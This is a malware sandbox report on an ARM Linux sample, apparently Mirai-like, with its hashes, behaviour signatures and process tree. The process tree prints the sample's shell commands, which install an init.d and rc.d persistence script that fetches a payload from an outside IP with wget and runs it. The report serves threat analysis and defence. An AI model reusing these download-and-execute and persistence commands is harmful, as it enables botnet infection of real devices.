Overview

overview

10

Static

static

10

arm7.nn.elf

debian-9-armhf

9

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    05/09/2024, 17:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    arm7.nn.elf

  • Size

    157KB

  • MD5

    9fe44e38f31dfc22fc37f8f4b0ad665b

  • SHA1

    003f2be0ac848c14527ec7b555e6517b8099c152

  • SHA256

    463cd5a52848c54f9c7736f71dc0fa2e2e117e14798cbfd7d7ca4f0ab32e9a8d

  • SHA512

    231d8d66523de1e9b3f41630e869a721f66a916ecf5fecd763108407d89fd885bc12a68b7efdf668cfd9d2989c6c9a1de5bd07fb313427a2fe2760aeb8720baa

  • SSDEEP

    3072:hkDdGanTaRJKm7GiSAubGkU58hsugq3VXM/9//mAwYhDNc:hkDhnTaRJKm7GiGbGmKugq35M/9XmAwZ

Score
9/10
defense_evasiondiscoveryexecutionpersistence

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Modifies init.d 2 TTPs 1 IoCs

    Adds/modifies system service, likely for persistence.

    persistence
  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 4 IoCs

    Execute scripts via Unix Shell.

    execution
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/arm7.nn.elf
    /tmp/arm7.nn.elf
    1⤵
    • Modifies Watchdog functionality
    • Modifies rc script
    • Changes its process name
    PID:655
    • /bin/sh
      /bin/sh -c "echo \"#!/bin/sh # /etc/init.d/arm7.nn.elf case \\\"\$1\\\" in start) echo 'Starting arm7.nn.elf' /tmp/arm7.nn.elf & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping arm7.nn.elf' killall arm7.nn.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/arm7.nn.elf"
      2⤵
      • Modifies init.d
      • Command and Scripting Interpreter: Unix Shell
      PID:657
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:659
      • /bin/chmod
        chmod +x /etc/init.d/arm7.nn.elf
        3⤵
          PID:662
      • /bin/sh
        /bin/sh -c "mkdir -p /etc/rc.d"
        2⤵
        • Command and Scripting Interpreter: Unix Shell
        PID:667
        • /bin/mkdir
          mkdir -p /etc/rc.d
          3⤵
          • Reads runtime system information
          PID:669
      • /bin/sh
        /bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf"
        2⤵
        • Command and Scripting Interpreter: Unix Shell
        PID:671
        • /bin/ln
          ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
          3⤵
            PID:673

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /etc/init.d/arm7.nn.elf
        Filesize

        407B

        MD5

        cca1fc56c22484f5782c4052405cd45c

        SHA1

        7991a1d47122cc9807ac8c80d2a8749db43da8b5

        SHA256

        16b6e8365451e48a63324d63e58a066662f3f4380f2b5efba7f6b4fe054e8c3a

        SHA512

        8f44534e1711ef9619e6e323c9117a7bbe9b38a7533ab69f6f8de414283b936283c2a4c2092e3ad3e107d5c1ae3ef56c743aa80e155f42da7d9376f5196eff1d

        Download Submit